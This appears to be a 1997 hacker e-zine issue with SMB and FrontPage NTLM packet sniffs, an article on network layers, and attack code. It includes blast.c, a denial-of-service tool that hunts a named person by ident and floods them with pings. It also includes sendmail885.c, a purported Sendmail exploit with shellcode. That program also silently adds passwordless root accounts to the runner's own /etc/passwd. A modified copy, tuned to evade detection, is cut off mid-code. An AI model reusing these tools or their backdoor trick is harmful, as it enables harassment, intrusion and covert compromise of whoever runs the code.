TCP: Data: Number of data bytes remaining = 176 (0x00B0)
NBT: SS: Session Message, Len: 172
NBT: Packet Type = Session Message
NBT: Packet Flags = 0 (0x0)
NBT: .......0 = Add 0 to Length
NBT: Packet Length = 172 (0xAC)
NBT: SS Data: Number of data bytes remaining = 172 (0x00AC)
SMB: R transact TransactNmPipe (response to frame 26)
SMB: SMB Status = Error Success
SMB: Error class = No Error
SMB: Error code = No Error
SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x01C0 UID = 0x0800
SMB: Tree ID (TID) = 2048 (0x800)
SMB: Process ID (PID) = 31936 (0x7CC0)
SMB: User ID (UID) = 2048 (0x800)
SMB: Multiplex ID (MID) = 448 (0x1C0)
SMB: Flags Summary = 152 (0x98)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 1....... = Server response
SMB: flags2 Summary = 32771 (0x8003)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS capabilities
SMB: ..0............. = No paging of IO
SMB: .0.............. = Using SMB status codes
SMB: 1............... = Using UNICODE strings
SMB: Command = R transact
SMB: Word count = 10
SMB: Word parameters
SMB: Total parm bytes = 0
SMB: Total data bytes = 116
SMB: Parameter bytes = 0 (0x0)
SMB: Parameter offset = 56 (0x38)
SMB: Parameter Displacement = 0 (0x0)
SMB: Data bytes = 116 (0x74)
SMB: Data offset = 56 (0x38)
SMB: Data Displacement = 0 (0x0)
SMB: Max setup words = 0
SMB: Byte count = 117
SMB: Byte parameters
SMB: Pipe function = Transact named pipe (TransactNmPipe)
SMB: Data: Number of data bytes remaining = 116 (0x0074)
MSRPC: c/o RPC Response: call 0x1 context 0x0 hint 0x5C cancels 0x0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Response
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 116 (0x74)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 1 (0x1)
MSRPC: Bind Frame Number = 25 (0x19)
MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
MSRPC: Allocation Hint = 92 (0x5C)
MSRPC: Presentation Context Identifier = 0 (0x0)
MSRPC: Cancel Count = 0 (0x0)
MSRPC: Reserved = 0 (0x0)
MSRPC: Stub Data
R_SRVSVC: RPC Server response srvsvc:NetrServerGetInfo(..)
R_SRVSVC: LPSERVER_INFO InfoStruct {..}
R_SRVSVC: Switch Value = 101 (0x65)
R_SRVSVC: LPSERVER_INFO_101 ServerInfo101 {..}
R_SRVSVC: DWORD sv101_platform_id = 500 (0x1F4)
R_SRVSVC: LPTSTR sv101_name = 1363784 (0x14CF48)
R_SRVSVC: DWORD sv101_version_major = 4 (0x4)
R_SRVSVC: DWORD sv101_version_minor = 0 (0x0)
R_SRVSVC: DWORD sv101_type = 266251 (0x4100B)
R_SRVSVC: LPTSTR sv101_comment = 1363812 (0x14CF64)
R_SRVSVC: LPTSTR sv101_name = 204.73.131.11
R_SRVSVC: LPTSTR sv101_comment =
R_SRVSVC: Return Value = 0 (0x0)
00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 9D 08 00 45 00 ..O.....O.....E.
00010: 00 D8 3C 0E 40 00 80 06 1F 60 CC 49 83 0B CC 49 ..<.@....`.I...I
00020: 83 13 00 8B 07 28 00 16 FB 1A 04 60 25 6F 50 18 .....(.....`%oP.
00030: 1C 92 7C 1E 00 00 00 00 00 AC FF 53 4D 42 25 00 ..|........SMB%.
00040: 00 00 00 98 03 80 24 82 00 00 00 00 00 00 00 00 ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 01 0A 00 00 74 00 00 .....|.......t..
00060: 00 00 00 38 00 00 00 74 00 38 00 00 00 00 00 75 ...8...t.8.....u
00070: 00 48 05 00 02 03 10 00 00 00 74 00 00 00 01 00 .H........t.....
00080: 00 00 5C 00 00 00 00 00 00 00 65 00 00 00 30 CF ..\.......e...0.
00090: 14 00 F4 01 00 00 48 CF 14 00 04 00 00 00 00 00 ......H.........
000A0: 00 00 0B 10 04 00 64 CF 14 00 0E 00 00 00 00 00 ......d.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 ................
000E0: 16 00 00 00 00 00 ......
Frontpage Sniff:
Below you notice the NTLM authentication process and that an application called
X-vermeer-urlencoded is the utility that is encrypting our LM password. An option
within IIS "Windows NT Challeng/Response" is turned on in the following example.
21 30.856 00C04FC48C8F STUDENT7 HTTP POST Request (from client using port 1140) 204.73.131.18 STUDENT7 IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 1, 1997 17:56:55.389
FRAME: Time delta from previous physical frame: 2 milliseconds
FRAME: Frame number: 21
FRAME: Total frame length: 433 bytes
FRAME: Capture frame length: 433 bytes
FRAME: Frame data: Number of data bytes remaining = 433 (0x01B1)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C93
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C8F
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 433 (0x01B1)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 419 (0x01A3)
IP: ID = 0xB805; Proto = TCP; Len: 419
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 419 (0x1A3)
IP: Identification = 47109 (0xB805)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xA296
IP: Source Address = 204.73.131.18
IP: Destination Address = 204.73.131.19
IP: Data: Number of data bytes remaining = 399 (0x018F)
TCP: .AP..., len: 379, seq: 705525-705903, ack: 4115388, win: 8760, src: 1140 dst: 80
TCP: Source Port = 0x0474
TCP: Destination Port = Hypertext Transfer Protocol
TCP: Sequence Number = 705525 (0xAC3F5)
TCP: Acknowledgement Number = 4115388 (0x3ECBBC)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8760 (0x2238)
TCP: Checksum = 0xA8FF
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 379 (0x017B)
HTTP: POST Request (from client using port 1140)
HTTP: Request Method = POST
HTTP: Uniform Resource Identifier = /_vti_bin/_vti_aut/author.dll
HTTP: Protocol Version = HTTP/1.0
HTTP: Date = Mon, 01 Dec 1997 23:57:10 GMT
HTTP: MIME-Version = 1.0
HTTP: User-Agent = MSFrontPage/3.0
HTTP: Host = 204.73.131.19
HTTP: Accept = auth/sicily
HTTP: Content-Length = 62
HTTP: Content-Encoding = x-vermeer-1
HTTP: Content-Type = application/x-vermeer-rpc
HTTP: Undocumented Header = X-Vermeer-Content-Type: application/x-vermeer-rpc
HTTP: Undocumented Header Fieldname = X-Vermeer-Content-Type
HTTP: Undocumented Header Value = application/x-vermeer-rpc
HTTP: Data: Number of data bytes remaining = 62 (0x003E)
00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 8F 08 00 45 00 ..O.....O.....E.
00010: 01 A3 B8 05 40 00 80 06 A2 96 CC 49 83 12 CC 49 ....@......I...I
00020: 83 13 04 74 00 50 00 0A C3 F5 00 3E CB BC 50 18 ...t.P.....>..P.
00030: 22 38 A8 FF 00 00 50 4F 53 54 20 2F 5F 76 74 69 "8....POST /_vti
00040: 5F 62 69 6E 2F 5F 76 74 69 5F 61 75 74 2F 61 75 _bin/_vti_aut/au
00050: 74 68 6F 72 2E 64 6C 6C 20 48 54 54 50 2F 31 2E thor.dll HTTP/1.
00060: 30 0D 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 30 31 0..Date: Mon, 01
00070: 20 44 65 63 20 31 39 39 37 20 32 33 3A 35 37 3A Dec 1997 23:57:
00080: 31 30 20 47 4D 54 0D 0A 4D 49 4D 45 2D 56 65 72 10 GMT..MIME-Ver
00090: 73 69 6F 6E 3A 20 31 2E 30 0D 0A 55 73 65 72 2D sion: 1.0..User-
000A0: 41 67 65 6E 74 3A 20 4D 53 46 72 6F 6E 74 50 61 Agent: MSFrontPa
000B0: 67 65 2F 33 2E 30 0D 0A 48 6F 73 74 3A 20 32 30 ge/3.0..Host: 20
000C0: 34 2E 37 33 2E 31 33 31 2E 31 39 0D 0A 41 63 63 4.73.131.19..Acc
000D0: 65 70 74 3A 20 61 75 74 68 2F 73 69 63 69 6C 79 ept: auth/sicily
000E0: 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 ..Content-Length
000F0: 3A 20 36 32 0D 0A 43 6F 6E 74 65 6E 74 2D 45 6E : 62..Content-En
00100: 63 6F 64 69 6E 67 3A 20 78 2D 76 65 72 6D 65 65 coding: x-vermee
00110: 72 2D 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 r-1..Content-Typ
00120: 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 e: application/x
00130: 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D 0A 58 2D -vermeer-rpc..X-
00140: 56 65 72 6D 65 65 72 2D 43 6F 6E 74 65 6E 74 2D Vermeer-Content-
00150: 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F Type: applicatio
00160: 6E 2F 78 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D n/x-vermeer-rpc.
00170: 0A 0D 0A B0 32 7D ED 9D 1C A9 A8 B3 BB BC 12 39 ....2}.........9
00180: 84 F7 B3 9C 83 A4 CF 39 B7 B4 BC 23 05 A7 41 79 .......9...#..Ay
00190: 05 F8 45 78 01 FA 41 50 01 F8 47 D4 07 55 7D E3 ..Ex..AP..G..U}.
001A0: F8 C2 9F 0F B4 BC 23 B9 A9 F9 F7 FC A4 1B 79 28 ......#.......y(
001B0: B1 .
If Windows NT Challenge/Response Security is enabled on the Web Server, each initial request to download a file, after establishing a TCP session,
is responded to with an accesss denied HTTP frame:
23 30.859 STUDENT7 00C04FC48C8F HTTP Response (to client using port 1140) STUDENT7 204.73.131.18 IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 1, 1997 17:56:55.392
FRAME: Time delta from previous physical frame: 0 milliseconds
FRAME: Frame number: 23
FRAME: Total frame length: 224 bytes
FRAME: Capture frame length: 224 bytes
FRAME: Frame data: Number of data bytes remaining = 224 (0x00E0)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C8F
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C93
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 224 (0x00E0)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 210 (0x00D2)
IP: ID = 0xC126; Proto = TCP; Len: 210
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 210 (0xD2)
IP: Identification = 49446 (0xC126)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x9A46
IP: Source Address = 204.73.131.19
IP: Destination Address = 204.73.131.18
IP: Data: Number of data bytes remaining = 190 (0x00BE)
TCP: .AP..., len: 170, seq: 4115388-4115557, ack: 705904, win: 8381, src: 80 dst: 1140
TCP: Source Port = Hypertext Transfer Protocol
TCP: Destination Port = 0x0474
TCP: Sequence Number = 4115388 (0x3ECBBC)
TCP: Acknowledgement Number = 705904 (0xAC570)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8381 (0x20BD)
TCP: Checksum = 0xD958
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 170 (0x00AA)
HTTP: Response (to client using port 1140)
HTTP: Protocol Version = HTTP/1.0
HTTP: Status Code = Unauthorized
HTTP: Reason = Access Denied
HTTP: WWW-Authenticate = NTLM
HTTP: WWW-Authenticate = Basic realm="204.73.131.19"
HTTP: Content-Length = 24
HTTP: Content-Type = text/html
HTTP: Data: Number of data bytes remaining = 24 (0x0018)
00000: 00 C0 4F C4 8C 8F 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E.
00010: 00 D2 C1 26 40 00 80 06 9A 46 CC 49 83 13 CC 49 ...&@....F.I...I
00020: 83 12 00 50 04 74 00 3E CB BC 00 0A C5 70 50 18 ...P.t.>.....pP.
00030: 20 BD D9 58 00 00 48 54 54 50 2F 31 2E 30 20 34 ..X..HTTP/1.0 4
00040: 30 31 20 41 63 63 65 73 73 20 44 65 6E 69 65 64 01 Access Denied
00050: 0D 0A 57 57 57 2D 41 75 74 68 65 6E 74 69 63 61 ..WWW-Authentica
00060: 74 65 3A 20 4E 54 4C 4D 0D 0A 57 57 57 2D 41 75 te: NTLM..WWW-Au
00070: 74 68 65 6E 74 69 63 61 74 65 3A 20 42 61 73 69 thenticate: Basi
00080: 63 20 72 65 61 6C 6D 3D 22 32 30 34 2E 37 33 2E c realm="204.73.
00090: 31 33 31 2E 31 39 22 0D 0A 43 6F 6E 74 65 6E 74 131.19"..Content
000A0: 2D 4C 65 6E 67 74 68 3A 20 32 34 0D 0A 43 6F 6E -Length: 24..Con
000B0: 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F tent-Type: text/
000C0: 68 74 6D 6C 0D 0A 0D 0A 45 72 72 6F 72 3A 20 41 html....Error: A
000D0: 63 63 65 73 73 20 69 73 20 44 65 6E 69 65 64 2E ccess is Denied.
[Basic Network Architecture, Part II...................................lurk3r]
In the last issue I covered the Basic of Layers and the way the communicate
with each other. In this article I will get more into each specific layer.
This is not going to be a huge layer. I had previously thought of doing a
long series on network architecture,but decided against it and to head more
in the direction of H/P although I did want to at least cover this last topic
for the sake of completeness.
The Physical Layer:
The physical layer is mostly related to transmitting raw data over a
communication channel. The designing issues of this layer mostly have to do
with making sure that when one side sends a bit, such as a 0 ,that the other
side also recieves it as a 0 and not a 1. The questions here are how many
volts should be used to represent a 0 and how many for a 1. How many
microseconds a bit occupies, whether transmission may continue simutaneously
in both directions, how the initial connection is established and how it is
stopped when both sides are finished. In some cases a transmission facility
consists of multiple physical channels,in which case the physical layer can
make them look like a single channel, although higher layers can also perform
this function.
The Data Link Layer:
The task of the Data Link Layer is to make a raw transmission facility and
transform it intoa line that appears free of transmission errors to the
network layer. It does this task by breaking the input up in data frames,
trans mitting the frames sequentially, and processing the acknowledgement
frames sent back by the reciever. Since layer 1 accepts and transmits a stream
of bits without any regar to meaning or structure, it is up to the data link
layer to create a recognize frame boundaries.This can be done by attaching
special bit patterns to the begginning and the end of the frame. The term
"frame" is not the official term for the unit exchanged by layer 2 peer
processes. The correct term is "physical-layer-service-data-unit". An issue
that arises at layer 2 (and higher layers as well) is how to keep a fast
transmitter from drowning a slower reciever of data. Some mechanism must be
employed to let the transmitter know how much buffer space the reciever has
at the moment. Typically this mechanism and the error handling are integrated
together. If the line can be used to transmit data in both directions, this
introduces a new complication that the data link layer software must software
must deal with.
The Network Layer:
The Network Layer, sometimes called the communication subnet layer, controls
the operation of the subnet. Among other things it determines the
characteristics of the IMP-host interface, and how packets, the units of
information exchanged in layer 3, are routed within the subnet. A major
design issue here is the devision of labor between the IMPs and hosts, in
particular who should ensure all packets are correctly recieved at their
destinations and in the proper order. What this layer of software does is
accept messages from the source host, convert them to packets, and see to it
that the packets get directed toward the destination. A key design issue here
is how the route is determined. It could be based on statis tables that are
"wired into" the network and rarely changed. It could also be determined at
the start of each conversation.
The Transport Layer:
The basic function of the transport layer, also known as the host-host layer,
is to accept data from the session layer, split it up into smaller units, if
need be, pass it to the network layer, and ensure that the pieces all arrive
correctly at the other end. Also this must be done in the most efficient way
possible, and in a way that isolates the sessions layer from the inevitable
changes of hardware technology. Under normal conditions the transport layer
creates a distinct network (layer 3) connection for each transport (layer 4)
connection required by the session layer. In addition to multiplexing several
message streams onto one physical channel (the host-IMP channel), the
transport layer must take care of establishing and disconnectiong connections
across the network. Although the network architecture specifies nothing about
the implementation, it is good to know that the transport layer is often
implemented by a part of the host operating system, which is known as the
transport station.
The Session Layer:
The session layer is the users interface into the network. It is with this
layer that the user must negotiate to establish a connection with a process
on some other machine. Once the connection has been established the session
layer can manage the dialog in an orderly manner, if the user has requested
that service. A connection between users is usually called a session. A
session might be to allow a user to log into a remote system or transfer a
file betweeen the machines. Another functions of the session layer is
management of the session once it has been setup. In some networks the
session and transport layers are merged into a single layer, or the
sessions layer is absent all together, if all the user wants is raw
communication service.
The Application Layer:
The content of the application layer us up to the individual user. When two
user programs on different machines communicate, they alone determine the st
of allowed messages and the action taken upon receipt of each. There are
still many issues that occur here, for example network trasparency, hiding the
physical distribution of resources from the user.
There are many other layers than the ones that I have introduced here. It all
depends on tailoring them to your needs on the basis of what your network
will be used for (i.e. business, isp, games net) and who it will be used by
(i.e. just you, friends or half of irc)
As I said this will probably be the last article on this and related areas,
unless I get enough mail about it. If you wish to know more on networks
architecture, mail me and ill see about possibly covering more areas. Direct
all comments and corrections to lurk3r@earthlink.net
Shout outs: #Virii (the old school fellaz and some of the new) #Phreak
(cause its the only decent phreak channel ive been able to find...heh) ,
Fa-q ( be more careful next time ) , Iczer (where is your article?),
memor (hey!), Scud (Quit faking u got a life and come hang with the fellaz)
and jlb (mail me some rollz).
EOF
[blast.c................................................................memor]
/***a hardcore blaster by memor/hbs-sjta 1997***
IMPORTANT NOTE: This program should only be used by AOL kiddies and lamers
because personally I think that DoS attacks are lame.
What does it do?
The program checks a range of ip addresses and when it finds your enemy's
ident, it kills him with five ICMPs of the packet size you want. After the
ICMP, it checks if the person is dead.
- If the person is dead, it continues scanning the dialups forever (while(1))
to see if the dude didn't switched to another one.. (stop it with ctrl-c)
- If the person is not dead, it will ICMP him again and again, hopefully
resulting in an eventual kill.
What do you use it?
-DEMO-
(woo~)$cc -o blast blast.c
(woo~)$blast
-*-A hardcore blaster for aol kidz by memz/hbs-sjta -1997-
-*-ident of the victim please:fuckerlame
-*-(isp) ip.ip.ip of the victim please:195.155.38
-*-Packet Size of ICMP (will be *5):5000
Scanning 195.155.38.1 - -/-Now Closing Connection..
Scanning 195.155.38.2 - -/-Now Closing Connection..
(...)
Scanning 195.155.38.255 - -/-Now Closing Connection..
Scanning 195.155.38.1 - -/-Now Closing Connection..
Scanning 195.155.38.2 - -/-Now Closing Connection..
(...)
control + c when you want it to end..
How do you protect against it?
For the poor people getting blasted by this...
Change ident regularly.. (your eleet++ pirch/mirc options)
or Run linux..
or Don't run an ident.. but somes ircd will want it, so you could be screwed
or Write the root of the isp ICMPing you about your being victimized
In conclusion...
If you want to improve the program do it.. first off, reduce the bugs because
I don't check any strlen of data strings (the ones that you fill with the
scanf for instance..).
Secondly, before connecting the host, I don't ping it.. you could do that to
speed up the scanning procedure.
Thirdly, put the global vars in local, 'cause global is kinda lame, but I'm
lazy#!@
Fourthly, if you are some lamer who knows some root bugtraq exploits, add in
the line sprintf(...,"ping -c %s ....",...); a -f for more blasting
efficiency.. it would give sprintf(...,"ping -f -c %s ...",...);
Lastly, programming a companion attacker to do several different types of DoS
attacks at once would be interesting.
Have fun..
memor
*/
/* includes for sockets, present,... */
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
/* Global vars because I'm too lazy to transmit parameters between functions */
FILE *soc;
int sock;
int cmpt;
char varident[255];
char iptoshoot[255];
char tailleicmp[25];
char varip[255];
char query[1024];
char Buffer[1024];
struct sockaddr_in ip;
struct hostent *hos;
/* functions used */
void answer();
void scanning();
void choiceipicmpident();
void icmpip();
int ishealive();
/* main function */
void main()
{
choiceipicmpident();
scanning();
}
/* choosing ident, ip.ip.ip and packetsize to blast the potential victim... */
void choiceipicmpident()
{
printf("-*-Some hardcore blaster for aol kidz by memz/hbs-sjta -1997-\n");
printf("-*-ident of the victim please:");
scanf("%s",varident);
printf("-*-(isp) ip.ip.ip of the victim please:");
scanf("%s",varip);
printf("-*-Packet Size of icmp (will be *5):");
scanf("%s",tailleicmp);
}
/* scanning functions.. scan forever for the victim, and when found, call icmpip() */
void scanning()
{
cmpt=0;
while(1)
{
cmpt++;
if(cmpt==255) cmpt=1;
sprintf(iptoshoot,"%s.%d",varip,cmpt);
printf("Scanning %s - ",iptoshoot);
hos = gethostbyname(iptoshoot);
bzero((char *)&ip,sizeof(ip));
bcopy(hos->h_addr,(char *)&ip.sin_addr,hos->h_length);
ip.sin_family=hos->h_addrtype;
ip.sin_port=htons(113);
if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 )
{
perror("socket");
}
else
{
if(connect(sock,(struct sockaddr *)&ip,sizeof(struct sockaddr)) > -1 )
{
printf("-/-Querying IP,Ident Port..\n");
sprintf(query,"1,1\n\0");
if ( send(sock, query, strlen(query), 0) < 0 )
{
perror("send");
exit(1);
}
printf("-/-Query sent\n");
answer();
printf("-/-Receive Analysis:\n");
printf("-/-Target...->%s<- . Current..->%s<-\n",varident,&Buffer[strlen(Buffer)-strlen(varident)]);
printf("-/-Is he the person to Kill? ->");
if(strcmp(varident,&Buffer[strlen(Buffer)-strlen(varident)])==0)
{
printf(" He is the person to Kill..\n");
icmpip();
}
else
{
printf(" Bad Target, back to scanning\n");
}
}
printf("-/-Now Closing Connection..\n");
close(sock);
}
}
}
/* icmpip() function called by scanning() one will ICMP the victim and after
5 mins waiting (you can reduce the wait time, I guess.. lame sleep(int)
hm..), calling function ishealive() to see if the "blast" was effective.. and
ICMP again and again if it wasn't.. */
void icmpip()
{
int killed;
int cpt;
char commande[1024];
killed=0;
do
{
sprintf(commande,"ping -c 50 -s %s %s &",tailleicmp,iptoshoot);
for(cpt=0;cpt<5;cpt++) system(commande);
sleep(5*60);
killed=ishealive();
}while(killed==0);
}
/* function called by icmpip() one and return 0 if the victim is not dead to
make the function icmpip() continue to try to kill and return 1 if the victim
was dead, for scanning() continues */
int ishealive()
{
int killen;
killen=0;
hos = gethostbyname(iptoshoot);
bzero((char *)&ip,sizeof(ip));
bcopy(hos->h_addr,(char *)&ip.sin_addr,hos->h_length);
ip.sin_family=hos->h_addrtype;
ip.sin_port=htons(113);
if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 )
{
perror("socket");
}
else
{
if(connect(sock,(struct sockaddr *)&ip,sizeof(struct sockaddr)) < 0 )
{
printf("-/-Target DEAD, back to scanning@#\n");
killen=1;
}
else
{
printf("-/-Querying IP,Ident Port..\n");
sprintf(query,"1,1\n\0");
if ( send(sock, query, strlen(query), 0) < 0 )
{
perror("send");
exit(1);
}
printf("-/-Query sent\n");
answer();
printf("-/-Receive Analysis:\n");
printf("-/-Target...->%s<- . Current..->%s<-\n",varident,&Buffer[strlen(Buffer)-strlen(varident)]);
printf("-/-Is he the person to Kill? ->");
if(strcmp(varident,&Buffer[strlen(Buffer)-strlen(varident)])==0)
{
printf(" Target STILL ALIVE, CONTINUE ICMP@#\n");
killen=0;
}
else
{
printf(" Target DEAD, back to scanning@#\n");
killen=1;
}
}
printf("-/-Now Closing Connection..\n");
close(sock);
}
return killen;
}
/* function answer, only receive the identd server answer in a lame global
var.. */
void answer()
{
int i;
char ch;
soc=fdopen(sock, "r");
i=0;
do
{
ch=getc(soc);
Buffer[i]=ch;
i++;
}
while(ch!='\r' && ch!=-1);
Buffer[i-1]='\0';
fclose(soc);
}
/* good luck.. memor 1997 for thtj18 */
[sendmail885.c...........................................................su1d]
/* carparts original k0d3d by su1d */
/* yeah like, we get k-rad on your */
/* fuckin ass's, and like you must */
/* be root in order to open up */
/* privladged ports, so like su */
/* root whores. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#define NOP 0x90
/* DO NOT CHANGE - SIZE COMPUTED */
char shellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff";
/* DO NOT CHANGE - SIZE COMPUTED */
char commands[] =
"/bin/echo \"n0tr00t::1000:1000:n0tr00t:/:/bin/bash\" >> /etc/passwd\n"
"/bin/echo \"r00t::0:0:r00t:/:/bin/bash\" >> /etc/passwd\n";
int main
(
int argc,
char **argv
)
{
int i;
int sock;
char *ptr;
char *clear;
char buf[8192];
struct sockaddr_in sin;
struct hostent *hp;
if(argc<2)
{
printf("READ COMMENTS\n");
exit(-1);
}
ptr = buf;
for(i=0;i<=4096;i++) buf[i] = NOP;
ptr += i;
memcpy(ptr,shellcode,sizeof(shellcode));
ptr += sizeof(shellcode);
clear = commands;
memcpy(ptr,clear,sizeof(commands));
ptr += sizeof(commands);
memcpy(ptr,"3824",4);
system(clear);
printf("CONNECTING TO %s\n",argv[1]);
hp = gethostbyname(argv[1]);
if(hp==NULL)
{
printf("UNKNOWN HOST\n");
exit(-1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
"/bin/echo \"heh | mail Banshee@evil-empire.com";
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
send(sock,buf,sizeof(buf),0);
close(sock);
printf("EXPLOIT SUCCESSFULLY EXECUTED\n");
return(0);
}
[sendmail885.c (2)......................................................scud_]
Note: Read the header. This code is all based on su1d's original
code, but modified slightly for user friendlyness, and less of a risk
of discovery.
/* sendmail885.c
* Sendmail 8.8.5 remote/local (if you use localhost for the host)
* exploit. Could be exploitable on other versions.
*
* carparts original code by su1d
*
* Modified slightly by scud_ <scud@thtj.com>
* - Fixed a few things I felt might get you discovered very fast
* - Also made this program a wee bit more user friendly
*
* Try gcc -o sendmail885 sendmail885.c to get this to compile
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#define NOP 0x90
/* DO NOT CHANGE - SIZE COMPUTED */
char shellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff";
/* DO NOT CHANGE - SIZE COMPUTED */
/* Carparts original set the shell to /bin/bash, I changed this to
tcsh, since tsch doesnt have a log, but all of this *really* doesnt matter
much. However, a sysadmin seeing a .bash_history file in / would not be a
good thing. You could also just ln the history file to /dev/null */
/* Carparts original set the 2 new accounts to 'n0tr00t' and 'r00t'. This
may be fine, but if a sysadmin did a who list and sees that, what do you
think his next command will be? I left the r00t, but modded n0tr00t to
stephen, since stephen sounds like such an innocent user. */
char commands[] =
"/bin/echo \"stephen::1000:1000:Stephen:/:/bin/tcsh\" >> /etc/passwd\n"
"/bin/echo \"r00t::0:0:r00t:/:/bin/tcsh\" >> /etc/passwd\n";
int main
(
int argc,
char **argv
)
{
int i;
int sock;
char *ptr;
char *clear;
char buf[8192];
struct sockaddr_in sin;
